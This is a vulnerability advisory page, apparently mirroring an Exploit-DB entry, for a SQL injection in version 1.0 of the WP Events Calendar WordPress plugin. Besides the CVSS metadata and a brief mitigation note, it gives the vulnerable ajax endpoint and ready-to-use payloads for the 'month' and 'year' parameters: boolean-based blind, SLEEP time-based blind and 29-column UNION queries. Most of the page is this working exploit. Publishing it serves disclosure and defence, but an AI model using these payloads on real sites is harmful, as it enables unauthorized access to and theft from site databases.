Wordpress Plugin Events Calendar - SQL Injection

vendor:

WP Events Calendar Plugin

by:

Özkan Mustafa Akkus (AkkuS)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WP Events Calendar Plugin

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:wachipi:wp_events_calendar_plugin

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

WordPress Plugin Events Calendar – SQL Injection

An attacker can perform attacks via calendar ajax queries. However, this plugin is fully PHP-enabled. You can run SQL query with 'month' and 'year' parameters. These parameters are also suitable for XSS attacks. All PHP queries for which these parameters work have the same vulnerable.

Mitigation:

Input validation and sanitization should be done for all user inputs. Also, use of prepared statements should be done to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Events Calendar - SQL Injection
# Dork: N/A
# Date: 2018-05-27
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor: Wachipi
# Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : An attacker can perform attacks via calendar ajax queries.
# However, this plugin is fully PHP-enabled. You can run SQL query with
# "month" and "year" parameters.
# These parameters are also suitable for XSS attacks.
# All PHP queries for which these parameters work have the same vulnerable.

# "getBookingForm.php, getMonthCalendar.php, getEventsList.php"
# Demo : http://www.checkingarea.com/EVENTS_WP/
# PoC : SQLi :
# GET
/EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1



# Parameter: month (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 
year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1

# Type: UNION query
# Title: MySQL UNION query (NULL) - 29 columns
# Payload: 
year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1

# Parameter: year (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: 
year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1

# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
year=2018' AND SLEEP(5)--
uTJs&month=5&day=1&calendar_id=1&pag=1

# Type: UNION query
# Title: MySQL UNION query (NULL) - 29 columns
# Payload: 
year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1